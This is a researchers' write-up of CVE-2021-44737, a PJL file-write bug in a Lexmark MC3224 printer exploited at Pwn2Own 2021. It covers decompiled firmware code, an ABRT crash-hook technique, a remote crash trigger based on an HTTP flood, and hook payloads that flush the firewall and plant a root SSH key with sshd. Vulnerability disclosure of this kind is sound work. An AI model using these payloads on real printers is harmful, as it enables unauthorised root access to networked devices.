Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)


This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022 together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we decided to buy a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, it means there may be a few differences and most probably we would not be able to target some features. We downloaded the firmware updates for both models and they were exactly the same so we decided to pursue since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory indicates all the affected Lexmark models.

The following steps described the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the Printer Job Language (PJL) commands and more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions but older versions are likely vulnerable too. We detail our analysis on CXLBL.075.272 in this blog post since CXLBL.075.281 was released mid-October, and we had already been working on it.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested to know how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to our first installment of our blog series.

Vulnerability details


As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:


PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing to read or write files on the device.

PRET is a tool allowing to talk PJL (among other languages) for several printer’s brands, but it does not necessarily support all of their commands due to each vendor supporting its own proprietary commands.

Reaching the vulnerable function

The hydra binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and undocumented.

int __fastcall setup_pjl_commands(int a1)
pjl_ctx = create_pjl_ctx(a1);
pjl_set_datastall_timeout(pjl_ctx, 5);
pjlpGrowCommandHandler("UEL", pjl_handle_uel);
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() at 0x1012F0 starts handling it. We see this command takes a string representing a filename as a first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file exists, it won’t open that file and returns immediately. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist in order for us to create the file and we also need to have permissions to write the file.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
if ( !filename )
return 0xFFFFFFFF;
fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL, 0777)
if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);// goes here
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
return ret;

We will analyse pjl_ldwelcomescreen_internal2() below but please note above that the file is closed at the end and then the filename is entirely deleted with the remove() call. This means it seems we can only temporarily write that file.

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
int flag,
int one,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
bad_arg = write_to_file == 0;
if ( write_to_file )
bad_arg = pjl_getc == 0;
if ( bad_arg )
return 0xFFFFFFFF;
if ( flag )
return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd);// goes here due to flag == 0

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. This function is quite big and hardly readable decompiled source code is shown below, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into some other allocations into a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
int was_last_write_success,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
unsigned int current_char_2; // r5
size_t len_to_write; // r4
int len_end_data; // r11
int has_encountered_at_sign; // r6
unsigned int current_char_3; // r0
int ret; // r0
int current_char_1; // r3
ssize_t len_written; // r0
unsigned int ret_2; // r3
ssize_t len_written_1; // r0
unsigned int ret_3; // r3
ssize_t len_written_2; // r0
unsigned int ret_4; // r3
int was_last_write_success_1; // r3
size_t len_to_write_final; // r4
ssize_t len_written_final; // r0
unsigned int ret_5; // r3
unsigned int ret_1; // [sp+0h] [bp-20h]
unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
_BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF
current_char_2 = 0xFFFFFFFF;
ret_1 = 0;
len_to_write = 0;
memset(data_to_write, 0, 0x401u);
len_end_data = 0;
has_encountered_at_sign = 0;
current_char_3 = current_char_2;
while ( 1 )
current_char = 0;
if ( current_char_3 == 0xFFFFFFFF )
// get one character from pjl_ctx->pData
ret = pjl_getc(&current_char);
current_char_1 = current_char;
// a previous character was already retrieved, let's use that for now
current_char_1 = (unsigned __int8)current_char_3;
ret = 1; // success
current_char = current_char_1;
if ( has_encountered_at_sign )
break; // exit the loop forever
// is it an '@' sign for a PJL-specific command?
if ( current_char_1 != '@' )
goto b_read_pjl_data;
len_end_data = 1;
has_encountered_at_sign = 1;
// from here, current_char == '@'
if ( len_to_write + 13 > 0x400 ) // ?
if ( was_last_write_success )
len_written = write_to_file(p_fd, data_to_write, len_to_write);
was_last_write_success = len_to_write == len_written;
current_char_2 = '@';
ret_2 = ret_1;
if ( len_to_write != len_written )
ret_2 = 0xFFFFFFFF;
ret_1 = ret_2;
current_char_2 = '@';
goto b_restart_from_scratch;
if ( ret == 0xFFFFFFFF ) // error
if ( !was_last_write_success )
return ret_1;
len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
ret_3 = ret_1;
if ( len_to_write != len_written_1 )
return 0xFFFFFFFF; // error
return ret_3;
if ( len_to_write > 0x400 )
// append data to stack buffer
data_to_write[len_to_write++] = current_char_1;
current_char_3 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
// reached 0x400 bytes to write, let's write them
if ( len_to_write == 0x400 )
current_char_2 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
if ( was_last_write_success )
len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
ret_4 = ret_1;
if ( len_written_2 != 0x400 )
ret_4 = 0xFFFFFFFF;
ret_1 = ret_4;
was_last_write_success_1 = was_last_write_success;
if ( len_written_2 != 0x400 )
was_last_write_success_1 = 0;
was_last_write_success = was_last_write_success_1;
goto b_restart_from_scratch;
} // end of while ( 1 )
// we reach here if we encountered an '@' sign
// let's check it is a valid "@PJL END DATA" footer
if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
len_end_data = 1;
has_encountered_at_sign = 0; // reset so we read it again?
goto b_read_data_or_at;
if ( len_end_data != 12 ) // len("PJL END DATA") = 12
// will go back to the while(1) loop but exit at the next
// iteration due to "break" and has_encountered_at_sign == 1
if ( current_char_1 != '@' )
goto b_read_pjl_data;
goto b_handle_pjl_at_sign;
// we reach here if all "PJL END DATA" was parsed
current_char = 0;
pjl_getc(&current_char); // read '\r'
if ( current_char == '\r' )
pjl_getc(&current_char); // read '\n'
// write all the remaining data (len < 0x400), except the "PJL END DATA" footer
len_to_write_final = len_to_write - 0xC;
if ( !was_last_write_success )
return ret_1;
len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
ret_5 = ret_1;
if ( len_to_write_final != len_written_final )
return 0xFFFFFFFF;
return ret_5;

The pjl_getc() function at 0xFEA18 allows to retrieve one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
pjl_ctx = get_pjl_ctx();
*ppOut = 0;
InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
pjl_set_eoj(pjl_ctx, 0);
pjl_set_InputDataBufferSize(pjl_ctx, 0);
if ( pjl_get_state(pjl_ctx) == 1 )
return 0xFFFFFFFF; // error
if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
"pjlContextGetInputDataBufferSize(pjlContext) != 0",
current_char = pjl_getc_internal(pjl_ctx);
ret = 1;
*ppOut = current_char;
return ret;

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
total_written = 0;
while ( 1 )
len_written = write(fd, data_to_write, len_to_write);
len_written_1 = len_written;
if ( len_written < 0 )
if ( !len_written )
goto b_error;
data_to_write = (char *)data_to_write + len_written;
total_written += len_written;
len_to_write -= len_written;
if ( !len_to_write )
return total_written;
while ( *_errno_location() == EINTR );
printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
return 0xFFFFFFFF;

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to that file, and if we refrain from sending the PJL command’s footer, it will wait for us to send more data, before it actually deletes the file entirely.

Note: When sending data, we generally want to send padding data to make sure it reaches a multiple of 0x400 so our controlled data is actually written to the file.

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance /usr/share/web/cgi-bin/eventlogdebug_se‘s content is:

echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo ""
echo ""
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write /var/fs/shared/eventlog/logs/debug.log.1 file with lots of A using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page:

From testing, we noticed that the file would be automatically deleted between 1min and 1min40, probably due to a timeout in the PJL handling in hydra. This means we are fine to use that temporary file primitive for 60 seconds.


Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf allows to execute shell commands:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following page describes well how ABRT works:

If a program developer (or package maintainer) requires some specific information which ABRT is not
collecting, they can write a custom ABRT hook which collects the required data for his program
(package). Such hook can be run at a different time during the problem processing depending on how
"fresh" the information has to be. It can be run:

1. at the time of the crash
2. at the time when user decides to analyse the problem (usually run gdb on it)
3. at the time of reporting

All you have to do is create a .conf and place it to /etc/libreport/events.d/ from this template:

   <whatever command you like>

The commands will execute with the current directory set to the problem directory (e.g:

If you need to collect the data at the time of the crash you need to create a hook that will be run as 
a post-create event.

WARNING: post-create events are run with root privileges!

From the above we can determine we need a post-create event and we know it will be executed as root if/when a crash event is actually handled by ABRT.

Finding a process crash

There are several ways to crash a process, and it seems that it usually creates a blue screen of death (BSOD) and then the printer reboots:

Such a process crash is enough to trigger the ABRT behaviour. Once we have such a process crash, abrtd should trigger the post-create event of our controlled file. By starting our own process (e.g. netcat, ssh) that never returns, we can avoid that the crash handling process continues and it will never result in a BSOD.

We abuse a bug in awk to trigger the crash. The version of awk used on the printer is quite old, so it had some bugs that don’t appear to exist on more modern versions. On the device if an awk command is run on a non-existent file, then an invalid free() can be triggered:

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' /tmp/doesnt_exist
free(): invalid pointer

In order to trigger this remotely we abuse a race condition that exists due to the second-based granularity (%S format specifier) used for naming log files in apache2. The configuration has the following line:

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p '/usr/bin/' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S 32K"

The above will trigger a log rotation for every 32KB of logs that are generated, with the resulting log file having a name that is unique, but only at a one second granularity. As a result, if enough HTTP logs are generated such that rotation occurs twice within one second, then two instances of may be parsing a file with the same name at the same time. In we see the following:

rm -f "${path_to_logs}"apache_error_log*.tar.gz
if [[ "${file_to_compress}" ]]; then
echo "Compressing ${file_to_compress} ..."
tar -czf "${file_to_compress}.tar.gz" "${file_to_compress}"
if [[ ${compress_exit_code} == 0 ]]; then
echo "File ${file_to_compress} was compressed."
echo "Check apache server status if needed to restart"
to_restart=$(awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' "${file_to_compress}")
if [ $to_restart -gt "5" ]
echo "Time to restart apache .."
rm -f "${path_to_logs}"apache_error_log*
systemctl restart apache2
rm -rf "${file_to_compress}"
echo "Error compressing file ${file_to_compress} (tar exit code: ${compress_exit_code})."
exit ${compress_exit_code}

Above file_to_compress is the apache error log file generated per the ErrorLog line shown earlier. After compressing the file successfully, the awk command is run against the file to determine if apache should be restarted, and then otherwise the file is deleted. The problem arises when multiple instances of this script are running at the same time, where one script deletes the log file from disk, and the second script runs awk on the file that no longer exists, which triggers the crash from noted above.

This crash can be triggered simply by sending a lot of HTTP traffic to the device.

Although we used this awk crash to trigger code execution, any remote pre-auth crash should be usable as long as it triggers ABRT to run.

Putting it all together

We use our temporary file write primitive to create the /etc/libreport/events.d/abort_edg.conf file with the following file (padded with lots of spaces due to requirements explained earlier):

EVENT=post-create /bin/ping -c 4
        iptables -F
        /bin/ping -c 4

We trigger a process crash, this will trigger ABRT to execute our above commands. We use interleaving ping commands to confirm when each intermediate command has been executed. We confirm the 8 ping packets being received using Wireshark. Then, we are able to connect to some listening service on the printer that is normally blocked by the firewall, confirming the firewall has been successfully disabled.

The following ABRT hook file disables the firewall, configures SSH and starts it:

EVENT=post-create iptables -F
    /bin/rm /var/fs/security/ssh/ssh_host_key
    mkdir /var/run/sshd || echo foo
    /usr/bin/ssh-keygen -b 256 -t ecdsa -N '' -f /var/fs/security/ssh/ssh_host_key
    echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBABl6xVq6dGu40kDyxwjlMw7sxq4JGhVdc4hvDlDPPhzmAyEBkUWZOPRsLcWYm5kDJN6zFPTS0a4KNbx56qICwkyGAHfRv/+lVMxO2BEPJyYUUdpRC3qmUx0xy3GlgpOUUl90LgiifwcO6UI0P4l+UsewOrDdP6ycuklzJCaa7jLlPkMjQ==" > /var/fs/security/ssh/authorized
    /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
    while true; /bin/ping -c 4; sleep 10; done

The exploit in action:

$ ./ -i
(13:20:01) [*] [file creation thread] running
(13:20:01) [*] Waiting for firewall to be disabled...
(13:20:01) [*] [file creation thread] connected
(13:20:01) [*] [file creation thread] file created
(13:20:01) [*] [crash thread] running
(13:20:09) [*] Firewall was successfully disabled
(13:20:09) [*] [crash thread] done
(13:20:10) [*] [file creation thread] done
(13:20:10) [*] All threads exited
(13:20:10) [*] Waiting for SSH to be available...
(13:20:10) [*] Spawning SSH shell
Line-buffered terminal emulation. Press F6 or ^Z to send EOF.

ABRT has detected 1 problem(s). For more info run: abrt-cli list
uid=0(root) gid=0(root) groups=0(root)

We see we started sshd under abrtd:

root@XXXXXXXXXXXXXX:~# ps -axjf
   1  772  772  772 ?           -1 Ssl      0   0:00 /usr/sbin/abrtd -d -s
 772 2343  772  772 ?           -1 S        0   0:00  \_ abrt-server -s
2343 2550  772  772 ?           -1 SN       0   0:00      \_ /usr/libexec/abrt-handle-event -i --nice 10 -e post-create -- /var/fs/shared/svcerr/abrt/ccpp-2021-10-20-07:06:21-2117
2550 2947  772  772 ?           -1 SN       0   0:00          \_ /bin/sh -c echo 'mission abort!'             iptables -F             echo 'mission abort!'             /bin/rm /var/fs/security/ssh/ssh_host_key             echo 'mission a
2947 2952  772  772 ?           -1 SN       0   0:00              \_ /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
2952 3107 3107 3107 ?           -1 SNs      0   0:00                  \_ sshd: root@pts/0
3107 3109 3109 3109 pts/0     3128 SNs      0   0:00                      \_ -sh
3109 3128 3128 3109 pts/0     3128 RN+      0   0:00                          \_ ps -axjf

Final words on Pwn2Own

When participating at Pwn2Own, our first attempt failed due to an unknown SSH error, that we did not encounter in our own testing environment. We could see that our commands got executed (the firewall was disabled and the SSH server was started/reachable), but it would not let us connect. Previously to the Pwn2Own event, during our exploit development, we had also tested a netcat payload so we decided to start both payloads on the second attempt which made us win. This shows that having backup plans is always useful when participating at Pwn2Own!